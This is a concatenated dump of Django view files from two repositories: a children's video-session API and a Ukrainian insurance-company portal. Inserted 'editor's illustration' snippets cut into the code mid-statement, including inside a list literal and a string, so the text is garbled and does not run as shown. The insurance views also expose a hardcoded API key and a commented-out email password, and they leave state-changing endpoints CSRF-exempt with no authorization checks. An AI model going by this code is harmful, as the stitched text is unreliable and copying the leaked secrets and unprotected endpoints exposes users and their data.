paginator.get_paginated_response(serializer.data)\n\n\n# filter values in all videos of typical children\nclass AllTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.all().exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 
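# --- Editor's illustration (hedged sketch; not part of the original record) ---
# The list endpoints above repeat the same paginate-then-serialize steps. They
# could be factored into one helper; the helper name below is mine, not the
# project's:
from rest_framework.pagination import PageNumberPagination

def paginated_response(request, queryset, serializer_class, page_size=20):
    paginator = PageNumberPagination()
    paginator.page_size = page_size
    page = paginator.paginate_queryset(queryset, request)
    serializer = serializer_class(page, many=True)
    return paginator.get_paginated_response(serializer.data)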
'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in sliced videos of typical children\nclass SlicedTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=True).exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in unsliced videos of typical children\nclass UnslicedTVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=False).exclude(tChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in all videos of atypical children\nclass AllATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.all().exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in sliced videos of atypical children\nclass SlicedATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=True).exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n# filter values in unsliced videos of atypical children\nclass UnslicedATVideosListAPIView(generics.ListAPIView):\n queryset = Videos.objects.filter(sliced__exact=False).exclude(atChild__isnull=True).order_by('-id')\n serializer_class = VideosSerializer\n\n filter_backends = [filters.SearchFilter]\n search_fields = ['camera_name', 'camera_angle_name', 'session__date', 'tChild__name', 'tChild__unique_no', 'tChild__sequence_no', 'atChild__name', 'atChild__clinic_no']\n\n\n# get single video\n@api_view(['GET'])\ndef getVideo(request, pk):\n video = Videos.objects.get(id=pk)\n serializer = VideosSerializer(video, many=False)\n return Response(serializer.data)\n\n\n# get single video details\n@api_view(['GET'])\ndef getVideoInfo(request, pk):\n video = Videos.objects.get(id=pk)\n\n # get child\n child = None\n if not video.tChild == None:\n child = TypicalChild.objects.get(id=video.tChild.id)\n else:\n child = AntypicalChild.objects.get(id=video.atChild.id)\n \n # get session\n session = Sessions.objects.get(id=video.session.id)\n\n res = {\n 'child_name': child.name,\n 'session_date': session.date,\n 'camera': video.camera_name,\n 'camera_angle': video.camera_angle_name,\n 'duration': video.duration,\n 'file_type': video.file_type,\n 'file_extension': video.file_extension\n }\n\n if not video.tChild == None:\n res['child_unique_no'] = child.unique_no\n res['child_sequence_no'] = child.sequence_no\n else:\n res['child_clinic_no'] = child.clinic_no\n \n return Response(res)\n\n \n\n# add typical child video\n@api_view(['POST'])\ndef addTVideo(request):\n serializer = VideosSerializer(data=request.data)\n\n if 
serializer.is_valid():\n # set video name\n camera = Cameras.objects.get(id=request.data['camera'])\n camera_angle = CameraAngles.objects.get(id=request.data['camera_angle'])\n child = TypicalChild.objects.get(id=request.data['tChild'])\n session = Sessions.objects.get(id=request.data['session'])\n\n name = f'{child.unique_no}_{session.id}_{camera.name}'\n \n #set file extension\n file_type = request.data['file_type']\n file_extension = ''\n if not file_type == None: \n t = file_type.split('/')[1]\n if t == 'mp4':\n file_extension = '.mp4'\n elif t == 'x-matroska':\n file_extension = '.mkv'\n else:\n file_extension = '.mp4'\n\n serializer.save(name=name, camera_name=camera.name, camera_angle_name=camera_angle.name, file_extension=file_extension)\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# add antypical child video\n@api_view(['POST'])\ndef addATVideo(request):\n print(request.data)\n serializer = VideosSerializer(data=request.data)\n\n if serializer.is_valid():\n # set video name\n camera = Cameras.objects.get(id=request.data['camera'])\n camera_angle = CameraAngles.objects.get(id=request.data['camera_angle'])\n child = AntypicalChild.objects.get(id=request.data['atChild'])\n session = Sessions.objects.get(id=request.data['session'])\n\n name = f'{child.clinic_no}_{session.id}_{camera.name}'\n \n #set file extension\n file_type = request.data['file_type']\n file_extension = ''\n if not file_type == None: \n t = file_type.split('/')[1]\n if t == 'mp4':\n file_extension = '.mp4'\n elif t == 'x-matroska':\n file_extension = '.mkv'\n else:\n file_extension = '.mp4'\n\n serializer.save(name=name, camera_name=camera.name, camera_angle_name=camera_angle.name, file_extension=file_extension)\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# update video\n@api_view(['PUT'])\ndef updateVideo(request, pk):\n print(request.data)\n video = Videos.objects.get(id=pk)\n serializer = VideosSerializer(data=request.data, instance=video)\n\n if serializer.is_valid():\n serializer.save()\n else:\n print(serializer.errors)\n\n return Response(serializer.data)\n\n\n# delete a video\n@api_view(['DELETE'])\ndef deleteVideo(request, pk):\n video = Videos.objects.get(id=pk)\n res = ''\n\n try:\n video.delete()\n res += 'video record was deleted. '\n if video.video:\n if default_storage.exists(video.video.path):\n default_storage.delete(video.video.path)\n res += 'video file was deleted. '\n if video.thumbnail:\n if default_storage.exists(video.thumbnail.path):\n default_storage.delete(video.thumbnail.path)\n res += 'video thumbnail was deleted. 
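# --- Editor's illustration (hedged sketch; not part of the original record) ---
# addTVideo and addATVideo above duplicate the MIME-subtype -> file-extension
# mapping. A small helper with the same rules (the helper name is mine):
def extension_for(file_type):
    if file_type is None:
        return ''
    subtype = file_type.split('/')[1]
    return {'mp4': '.mp4', 'x-matroska': '.mkv'}.get(subtype, '.mp4')

assert extension_for('video/x-matroska') == '.mkv'
assert extension_for('video/mp4') == '.mp4'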
'\n except:\n res = 'error, something went wrong!'\n\n return Response(res)\n\n\n# delete all videos\n@api_view(['DELETE'])\ndef deleteVideos(request):\n videos = Videos.objects.all()\n res = ''\n \n try:\n for v in videos:\n v.delete()\n if v.video:\n if default_storage.exists(v.video.path):\n default_storage.delete(v.video.path)\n if v.thumbnail:\n if default_storage.exists(v.thumbnail.path):\n default_storage.delete(v.thumbnail.path)\n res = 'all Videos were deleted(records, video files, thumbnails)'\n except:\n res = 'error, something went wrong!'\n\n return Response(res)","repo_name":"SachinAthu/CSAAT-dev","sub_path":"backend/api/views/videos_views.py","file_name":"videos_views.py","file_ext":"py","file_size_in_byte":11283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25728863162","text":"import os\nimport pandas\nfrom .classes import *\nfrom django.contrib import auth\nfrom .forms import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate\nfrom .forms import SignupForm\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom .tokens import account_activation_token\nfrom django.contrib.auth.models import User\nfrom django.core.mail import EmailMessage\nimport threading\nfrom .processor import Processor\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\ndef index(request):\n # companu = CompanyInfo.objects.get(IM_NUMIDENT=20693867)\n # tmp=Order(user=request.user, company_info=companu, reporting_date='2020-06-21', calc_type='1', offered=True)\n # tmp.save()\n companies = Company.objects.all()\n template = loader.get_template('insurance_app/index.html')\n context = {\n 'companies': companies,\n }\n company_code = \"19209435\"\n api_key = \"VChFavBht5ug\"\n return HttpResponse(template.render(context, request))\n\ndef choose_company(request):\n template1 = loader.get_template('insurance_app/choose_company.html')\n company_user = CompanyUser.objects.filter(user=request.user)\n print(company_user)\n if company_user:\n context = {'company_user': company_user}\n return HttpResponse(template1.render(context, request))\n else:\n return render(request, 'insurance_app/choose_company_info.html')\n\ndef company_is_chosen(request, IM_NUMIDENT):\n template1 = loader.get_template('insurance_app/text_page.html')\n request.session['company_IM_NUMIDENT'] = IM_NUMIDENT\n company = Company.objects.filter(IM_NUMIDENT=IM_NUMIDENT).last()\n context = {'text': 'Ви увійшли у компанію '+ company.IAN_FULL_NAME}\n return HttpResponse(template1.render(context, request))\n\ndef company_logout(request, IM_NUMIDENT):\n template1 = loader.get_template('insurance_app/text_page.html')\n request.session['company_IM_NUMIDENT'] = None\n company = Company.objects.filter(IM_NUMIDENT=IM_NUMIDENT).last()\n context = {'text': 'Ви вийшли з компанії '+ company.IAN_FULL_NAME}\n return HttpResponse(template1.render(context, request))\n\ndef company_list(request):\n user = request.user\n try:\n user_companies = CompanyUser.objects.filter(user=user)\n except:\n user_companies = None\n try:\n company_docs = Documents.objects.filter(user=user, 
type_of_contract = 'contract')\n except:\n company_docs = None\n try:\n session_company = request.session['company_IM_NUMIDENT']\n print(session_company)\n except:\n session_company = None\n return render(request, 'insurance_app/company_list.html', {'user_companies': user_companies,\n 'session_company': session_company,\n 'company_docs': company_docs})\n\n@csrf_exempt\ndef add_info_to_company(request, company_IM_NUMIDENT):\n db_obj = DatabaseAccess()\n user = request.user\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = company_IM_NUMIDENT)\n address = request.POST['info_address']\n bank_props = request.POST['bank_props']\n position = request.POST['position']\n pib = request.POST['pib']\n action_base = request.POST['action_base']\n db_obj.insert_change_request(user, company_info, address, bank_props, position, pib, action_base)\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на зміну інформації про компанію ' + company_info.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\ndef company_detail(request, company_IM_NUMIDENT):\n last_date = Company.objects.last().update_date\n str_last_date = last_date.strftime(\"%d-%m-%Y %H:%M\")\n user_flag = False\n user = request.user\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = company_IM_NUMIDENT)\n form1 = AddInfoToCompany(instance=company_info)\n try:\n company = Company.objects.get(IM_NUMIDENT=company_IM_NUMIDENT, update_date=last_date)\n rows = CompanyUser.objects.filter(user=user)\n for row in rows:\n if row.company_info.IM_NUMIDENT == company.IM_NUMIDENT:\n user_flag = True\n except ObjectDoesNotExist:\n company = None\n return render(request, 'insurance_app/company_detail.html', {'company': company, 'user_flag': user_flag, 'str_last_date':str_last_date, 'form1':form1})\n\n@csrf_exempt\ndef update_database(request):\n if request.is_ajax() and request.method == 'POST':\n alert_data = request.POST[\"alert_data\"]\n if int(alert_data) > 7:\n processor = Processor()\n thread = threading.Thread(target=processor.update_company)\n thread.start()\n return JsonResponse({'context': 'База даних компаній буде оновлена'})\n elif alert_data.strip() == 'None':\n processor = Processor()\n thread = threading.Thread(target=processor.load_company)\n thread.start()\n return JsonResponse({'context': 'База даних компаній буде завантажена'})\n else:\n return JsonResponse({'context': 'База даних компаній НЕ буде оновлена'})\n\n@csrf_exempt\ndef accept_chosen_request(request):\n request_id = request.POST.get('request_id')\n confirm_request = Request.objects.get(id = request_id)\n confirm_request.confirm=True\n confirm_request.save()\n return JsonResponse({})\n\n@csrf_exempt\ndef accept_all_request(request):\n requests = Request.objects.all()\n for request in requests:\n if request.confirm == False:\n request.confirm=True\n request.save()\n return JsonResponse({})\n\n@csrf_exempt\ndef load_to_database(request):\n db_obj = DatabaseAccess()\n db_obj.update_company_user()\n return JsonResponse({})\n\ndef check_requests():\n flag=True\n rows = Request.objects.all()\n for row in rows:\n if row.confirm==False:\n flag=False\n break\n return flag\n\ndef admin_page(request):\n user = request.user\n admin = user.is_superuser\n db_obj = DatabaseAccess()\n try:\n data = db_obj.get_update_data()\n now = timezone.now()\n alert_data = (now - data).days\n except:\n alert_data = None\n requests = Request.objects.all()\n template = 
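# --- Editor's illustration (hedged sketch; not part of the original record) ---
# update_database() above hands the long-running refresh to a background
# thread so the HTTP request can return at once. The bare pattern:
import threading

def fire_and_forget(fn, *args):
    thread = threading.Thread(target=fn, args=args)
    thread.start()  # the request thread returns; the work continues in background
    return thread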
loader.get_template('insurance_app/admin_page.html')\n check_requests_flag = check_requests()\n print(dir(requests))\n context = {\n 'admin': admin,\n 'requests': requests,\n 'check_requests_flag' : check_requests_flag,\n 'alert_data': alert_data,\n }\n return HttpResponse(template.render(context, request))\n\ndef admin_page_contract(request):\n user = request.user\n admin = user.is_superuser\n docs = Documents.objects.all()\n template = loader.get_template('insurance_app/admin_page_contract.html')\n context = {\n 'admin': admin,\n 'docs': docs,\n }\n return HttpResponse(template.render(context, request))\n\ndef received_contract_act(request, doc_id):\n user = request.user\n doc = Documents.objects.get(id=doc_id)\n if request.POST:\n file_location_received = request.POST['file_location_received']\n doc.file_location_received = file_location_received\n doc.received = True\n doc.signed_by_client = True\n doc.save()\n return redirect('insurance_app:admin_page_contract')\n else:\n doc_form = DocContractActForm()\n template = loader.get_template('insurance_app/received_contract_act.html')\n context = {\n 'doc':doc,\n 'user':user,\n 'doc_form': doc_form,\n }\n return HttpResponse(template.render(context, request))\n\ndef received_bill(request, doc_id):\n user = request.user\n doc = Documents.objects.get(id=doc_id)\n if request.POST:\n file_location_received = request.POST['file_location_received']\n current_payment_amount = request.POST['current_payment_amount']\n doc.file_location_received = file_location_received\n doc.current_payment_amount = current_payment_amount\n doc.received = True\n doc.signed_by_client = True\n if float(current_payment_amount) >= doc.full_payment_amount:\n doc.paid_in_full = True\n doc.save()\n return redirect('insurance_app:admin_page_contract')\n else:\n doc_form = DocBillForm()\n template = loader.get_template('insurance_app/received_bill.html')\n context = {\n 'doc':doc,\n 'user':user,\n 'doc_form': doc_form,\n }\n return HttpResponse(template.render(context, request))\n\ndef add_company(request):\n user = request.user\n template = loader.get_template('insurance_app/add_company.html')\n if request.method == \"POST\":\n pass\n else:\n form3 = AddCompanyForm()\n form4 = DeleteCompanyForm()\n form4.fields['company']._set_queryset(CompanyUser.objects.filter(user = user))\n context = {\n 'user' : user,\n 'form3': form3,\n 'form4': form4,\n }\n return HttpResponse(template.render(context, request))\n\ndef user_page(request):\n user = request.user\n template = loader.get_template('insurance_app/user_page.html')\n if request.method == \"POST\":\n form1 = UserUpdateForm(request.POST,instance=user)\n form2 = UserProfileForm(request.POST,instance=user.userprofile)\n if form1.is_valid() and form2.is_valid():\n post1 = form1.save(commit=False)\n post2 = form2.save(commit=False)\n post1.save()\n post2.save()\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Данні аккаунта було успішно змінено '}\n return HttpResponse(template1.render(context, request))\n else:\n form1 = UserUpdateForm(instance=user)\n form2 = UserProfileForm(instance=user.userprofile)\n context = {\n 'user' : user,\n 'form1': form1,\n 'form2': form2,\n }\n return HttpResponse(template.render(context, request))\n\ndef create_contract(request, IM_NUMIDENT):\n print(IM_NUMIDENT)\n user = request.user\n template = loader.get_template('insurance_app/create_contract.html')\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = IM_NUMIDENT)\n if request.POST:\n with 
open('insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt', 'w') as f:\n f.write(\"DOC\"+IM_NUMIDENT)\n user = request.user\n user_email = user.email\n mail_subject = 'Договір '\n filepath_result = 'insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt'\n message = render_to_string('insurance_app/send_result.html', {\n 'user': user,\n 'domain': settings.DEFAULT_DOMAIN,\n })\n email = EmailMessage(\n mail_subject, message, to=[user_email]\n )\n email.attach_file(filepath_result)\n email.send()\n tmp = Documents.objects.get(company_info = company_info, type_of_contract = 'contract')\n tmp.signed_by_us = True\n tmp.sended = True\n tmp.file_location_sended = 'insurance_app/contract_files_sended/contract_'+IM_NUMIDENT+'.txt'\n tmp.save()\n return redirect('insurance_app:index')\n else:\n context = {'IM_NUMIDENT': IM_NUMIDENT,\n 'company_info': company_info}\n return HttpResponse(template.render(context, request))\n\n@csrf_exempt\ndef add_chosen_company(request):\n create_contract_flag = False\n db_obj = DatabaseAccess()\n user = request.user\n choice_id = request.POST['company']\n current_company = Company.objects.get(id=choice_id)\n try:\n company_info = CompanyInfo.objects.get(IM_NUMIDENT = current_company.IM_NUMIDENT)\n except:\n db_obj.create_company_info(current_company.IM_NUMIDENT, current_company.IAN_FULL_NAME)\n company_info = CompanyInfo.objects.get(IM_NUMIDENT=current_company.IM_NUMIDENT)\n try:\n contract_get = Documents.objects.get(company_info = company_info, type_of_contract = 'contract')\n except:\n tmp = Documents(user=user, company_info=company_info, type_of_contract=\"contract\")\n tmp.save()\n create_contract_flag = True\n print(tmp)\n db_obj.insert_request(user, company_info, 'add')\n IM_NUMIDENT = company_info.IM_NUMIDENT\n print('Action \"add\" is added to requests table')\n if create_contract_flag:\n return redirect('insurance_app:create_contract', IM_NUMIDENT = IM_NUMIDENT)\n else:\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на додання компанії ' + current_company.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\n@csrf_exempt\ndef delete_chosen_company(request):\n db_obj = DatabaseAccess()\n choice_id = request.POST['company']\n company_info = CompanyUser.objects.get(id=choice_id).company_info\n user = request.user\n # fromaddr = 'strahovka.work2020@gmail.com'\n # toaddr = auth_user.email\n # toaddr = current_company.email\n\n # username = 'strahovka.work2020@gmail.com'\n # password = 'cdnblpUYBvdlH8'\n # server = smtplib.SMTP('smtp.gmail.com:587')\n db_obj.insert_request(user, company_info, 'delete')\n print('Action \"delete\" is added to requests table')\n # server.starttls()\n # server.login(username, password)\n # msg1 = 'Потвердите что вашу компанию обслуживает ' + str(site_user.first_name)\n # msg2 = 'Confirm that you want to add this company' + str(current_company.IAN_FULL_NAME) + str(\n # current_company.IM_NUMIDENT)\n # server.sendmail(fromaddr, toaddr, msg2.encode(\"utf8\"))\n # server.quit()\n template1 = loader.get_template('insurance_app/text_page.html')\n context = {'text': 'Запит на видалення компанії ' + company_info.IAN_FULL_NAME + ' був відправлений адміністратору'}\n return HttpResponse(template1.render(context, request))\n\ndef update_company(request):\n db_obj = DatabaseAccess()\n obj = Updates()\n modify_obj = DataModify()\n try:\n data = db_obj.get_update_data()\n now = timezone.now()\n print((now - data).days)\n 
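# --- Editor's illustration (hedged sketch; not part of the original record) ---
# create_contract() above sends a file with Django's EmailMessage. The minimal
# shape of that send (subject, body, address and path are placeholders):
from django.core.mail import EmailMessage

def send_with_attachment(subject, body, to_addr, filepath):
    email = EmailMessage(subject, body, to=[to_addr])
    email.attach_file(filepath)  # reads the file from disk and attaches it
    email.send()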
if (now - data).days < 7:\n print(1)\n tuple_obj = obj.parser()\n rows = Company.objects.filter(update_date = data)\n modify_obj.modify_company(tuple_obj[0])\n obj.compare(rows, tuple_obj[0])\n print(db_obj.upload_companies(tuple_obj[0]) + '1')\n else: return HttpResponse(\"Not updated\")\n except AttributeError:\n print(2)\n tuple_obj = obj.parser()\n modify_obj.modify_company(tuple_obj[0])\n print(db_obj.upload_companies(tuple_obj[0]) + '2')\n return HttpResponse(\"Updated\")\n\ndef logout(request):\n auth.logout(request)\n return redirect('insurance_app:index')\n\ndef register(request):\n if request.method == 'POST':\n form1 = SignupForm(request.POST)\n if form1.is_valid():\n user = form1.save(commit=False)\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n mail_subject = 'Активация вашего аккаунта'\n message = render_to_string('insurance_app/acc_active_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid':urlsafe_base64_encode(force_bytes(user.pk)),\n 'token':account_activation_token.make_token(user),\n })\n to_email = form1.cleaned_data.get('email')\n domain = to_email.split('@')[1]\n email = EmailMessage(\n mail_subject, message, to=[to_email]\n )\n email.send()\n return render(request, 'insurance_app/activate_account.html', {'domain':domain})\n else:\n form1 = SignupForm()\n return render(request, 'insurance_app/register.html', {'form1': form1})\n\ndef activate(request, uidb64, token):\n try:\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n form = UserProfileForm({'user': user})\n post = form.save()\n post.save()\n login(request, user)\n return redirect('insurance_app:add_userprofile')\n else:\n return HttpResponse('Activation link is invalid!')\n\ndef add_userprofile(request):\n\n if request.method == 'POST':\n user = request.user\n form = UserProfileForm(request.POST, instance=user.userprofile)\n if form.is_valid():\n post1 = form.save(commit=False)\n post1.save()\n return redirect('insurance_app:index')\n else:\n user = request.user\n try:\n form = UserProfileForm(instance=user.userprofile)\n except: form = None\n return render(request, 'insurance_app/add_userprofile.html', {'form': form})\n\ndef auto_insurance(request):\n form = AutoInsurance()\n return render(request, 'insurance_app/auto_insurance.html', {'form': form})\n\n@csrf_exempt\ndef auto_fill(request):\n number = request.POST[\"number\"]\n update_obj = Updates()\n context = update_obj.gai(number)\n return JsonResponse({'context':context})\n\ndef order(request,order_id):\n template = loader.get_template('insurance_app/order.html')\n try:\n session_order_company = request.session['company_IM_NUMIDENT']\n session_company = CompanyInfo.objects.get(IM_NUMIDENT = session_order_company)\n except:\n session_company = None\n user = request.user\n print(session_company)\n if session_company:\n user_orders_offered = Order.objects.order_by(\"-order_date\").filter(user=user, company_info = session_company,\n offered=True, rejected=False,active=False)\n user_orders = Order.objects.order_by(\"-order_date\").filter(user=user, company_info=session_company,active=True)\n print(user_orders_offered)\n if len(user_orders_offered) > 3:\n user_orders_offered3 = Order.objects.order_by(\"-order_date\").filter(user=user, company_info = session_company,\n 
offered=True, rejected=False, active=False)[:3]\n else: user_orders_offered3 = []\n else:\n user_orders_offered = []\n user_orders = []\n user_orders_offered3 = []\n if request.POST:\n print(request.POST)\n db_obj = DatabaseAccess()\n choice_id = request.session['company_IM_NUMIDENT']\n print(choice_id)\n company_info = CompanyInfo.objects.get(IM_NUMIDENT=choice_id)\n user = request.user\n reporting_date = request.POST['reporting_date']\n calc_type = request.POST['calc_type']\n new_calc_type, order = db_obj.find_offered_order(user, company_info, reporting_date, calc_type)\n if not new_calc_type:\n order = db_obj.insert_order(user, company_info, reporting_date, calc_type)\n file_path = \"insurance_app/xlsx_files/r3_\"+choice_id+\".xlsx\"\n print('XXX')\n print(calc_type)\n print(type(calc_type))\n if calc_type == '1':\n print(calc_type)\n print(os.listdir)\n print(os.path.exists(file_path))\n if os.path.exists(file_path):\n print(\"KKK\")\n return redirect('insurance_app:show_count_result', order_id = order.id)\n else:\n return redirect('insurance_app:show_count_error', order_id=order.id, reason='not_enough_data')\n else:\n return redirect('insurance_app:order', 0)\n else:\n if order_id == 0:\n form = OrderForm()\n order = 0\n elif order_id!=0:\n try:\n order = Order.objects.get(id=order_id)\n print(order.company_info.IAN_FULL_NAME)\n if order.user == user and order.company_info.IM_NUMIDENT == session_order_company:\n form = OrderForm({'reporting_date': str(order.reporting_date), 'calc_type': str(order.calc_type)})\n else:\n form = None\n order = None\n except:\n form = None\n order = None\n context = {\n 'form': form,\n 'order': order,\n 'user_orders': user_orders,\n 'user_orders_offered':user_orders_offered,\n 'user_orders_offered3': user_orders_offered3,\n 'session_company': session_company,\n }\n return HttpResponse(template.render(context, request))\n\ndef show_count_result(request, order_id):\n template = loader.get_template('insurance_app/show_count_result.html')\n if request.POST:\n order = Order.objects.get(id=order_id)\n doc_act = Documents.objects.get(order_id=order_id, type_of_contract = 'act')\n doc_act.sended = True\n doc_act.save()\n doc_bill= Documents.objects.get(order_id=order_id, type_of_contract = 'bill')\n doc_bill.sended = True\n doc_bill.save()\n filepath_act = doc_act.file_location_sended\n filepath_bill = doc_bill.file_location_sended\n order.accepted = True\n order.save()\n user = request.user\n user_email = user.email\n mail_subject = 'Результат замовлення № ' + str(order.id)\n filepath_result = order.result_file\n message = render_to_string('insurance_app/send_result.html', {\n 'user': user,\n 'domain': settings.DEFAULT_DOMAIN,\n })\n email = EmailMessage(\n mail_subject, message, to=[user_email]\n )\n email.attach_file(filepath_result)\n email.attach_file(filepath_act)\n email.attach_file(filepath_bill)\n email.send()\n return redirect('insurance_app:index')\n else:\n file_path = \"insurance_app/xlsx_files/r3_32717175.xlsx\"\n data = pandas.read_excel(file_path, 'Лист1', usecols=\"C\")\n new_data = data.to_dict('index')\n print(new_data)\n output_data = new_data[1]['Всього:'] + 5\n order = Order.objects.get(id = order_id)\n order.enough_data = True\n order.done = True\n order.result_file = 'insurance_app/result_files_sended/result_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt'\n order.save()\n with 
open('insurance_app/result_files_sended/result_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(str(output_data))\n with open('insurance_app/act_files_sended/act_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(\"ACT\"+order.company_info.IM_NUMIDENT)\n tmp1 = Documents(user=request.user, company_info = order.company_info, type_of_contract='act', order_id = order.id,\n file_location_sended = 'insurance_app/act_files_sended/act_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt',\n signed_by_us = True)\n tmp1.save()\n with open('insurance_app/bill_files_sended/bill_'+order.company_info.IM_NUMIDENT+'_'+order.calc_type+'_'+str(order.reporting_date)+'.txt', 'w') as f:\n f.write(\"BILL\"+order.company_info.IM_NUMIDENT)\n tmp2 = Documents(user=request.user, company_info=order.company_info, type_of_contract='bill', order_id=order.id,\n file_location_sended='insurance_app/bill_files_sended/bill_' + order.company_info.IM_NUMIDENT + '_' + order.calc_type + '_' + str(\n order.reporting_date) + '.txt',\n signed_by_us=True, full_payment_amount = 500.0, current_payment_amount = 0.0)\n tmp2.save()\n context = {'output_data': output_data, 'order_id': order_id}\n return HttpResponse(template.render(context, request))\n\n\ndef show_count_error(request, order_id, reason):\n template = loader.get_template('insurance_app/show_count_error.html')\n if reason == 'not_enough_data':\n error = 'Не вистачає даних Розділу 3 для цього виду розрахунку.' \\\n ' Будь ласка, перейдіть у вкладку \"Завантаження\" та завантажте Розділ 3'\n context = {'error': error}\n return HttpResponse(template.render(context, request))\n\ndef order_history(request):\n template = loader.get_template('insurance_app/order_history.html')\n user = request.user\n try:\n session_company = request.session['company_IM_NUMIDENT']\n user_company = CompanyInfo.objects.get(IM_NUMIDENT = session_company)\n except:\n session_company = None\n user_company = None\n if user_company:\n user_orders = Order.objects.order_by(\"-order_date\").filter(\n Q(user=user, company_info = user_company, active=True) | Q(user=user, company_info = user_company, offered=True, rejected=True))\n else:\n user_orders = None\n context = {\n 'user_orders': user_orders,\n 'session_company': session_company,\n 'user_company' : user_company,\n }\n return HttpResponse(template.render(context, request))\n\ndef show_order(request, order_id):\n template = loader.get_template('insurance_app/show_order.html')\n user = request.user\n IM_NUMIDENT = request.session['company_IM_NUMIDENT']\n try:\n order = Order.objects.get(id=order_id)\n if order.user == user and order.company_info.IM_NUMIDENT == IM_NUMIDENT:\n user_flag = True\n else:\n user_flag = False\n with open('insurance_app/result_files_sended/result_' + order.company_info.IM_NUMIDENT + '_'\n + order.calc_type + '_' + str(order.reporting_date) + '.txt', 'r') as f:\n file_info = f.read()\n except:\n order = None\n user_flag = None\n file_info = None\n context = {'order': order, 'user_flag': user_flag, 'file_info': file_info}\n return HttpResponse(template.render(context, request))\n\ndef reject_order(request, order_id):\n order = Order.objects.get(id=order_id)\n order.rejected = True\n order.order_date = datetime.datetime.now()\n order.save()\n return redirect('insurance_app:order', order_id = 0)\n\ndef order_offered(request):\n template = 
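# --- Editor's illustration (hedged sketch; not part of the original record) ---
# show_count_result() above pulls one spreadsheet column into a dict with
# pandas. The same access pattern on a hypothetical workbook:
import pandas as pd

data = pd.read_excel('r3_report.xlsx', sheet_name='Лист1', usecols='C')  # hypothetical path
rows = data.to_dict('index')  # {row_index: {column_header: value}, ...}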
loader.get_template('insurance_app/order_offered.html')\n user = request.user\n try:\n session_company = request.session['company_IM_NUMIDENT']\n user_company = CompanyInfo.objects.get(IM_NUMIDENT = session_company)\n except:\n session_company = None\n user_company = None\n if session_company:\n user_orders_offered = Order.objects.order_by(\"-order_date\").filter(user=user,company_info = user_company,\n offered=True,rejected=False,active=False)\n else: user_orders_offered = None\n print(user_orders_offered)\n context = {\n 'user_orders_offered' : user_orders_offered,\n 'session_company': session_company,\n 'user_company': user_company\n }\n return HttpResponse(template.render(context, request))\n\ndef csrf_failure(request, reason=\"\"):\n ctx = {'message': 'Виникла помилка. Перевірте, чи підключені cookies у вашому браузері або перезавантажте сторінку, або спробуйте увійти ще раз'}\n return render(request, 'insurance_app/csrf_failure.html', ctx)\n\ndef documents(request, IM_NUMIDENT):\n template = loader.get_template('insurance_app/documents.html')\n company_documents = Documents.objects.filter(company_info = IM_NUMIDENT).order_by(\"order_id\")\n company_name = CompanyInfo.objects.get(IM_NUMIDENT = IM_NUMIDENT).IAN_FULL_NAME\n context = {\n 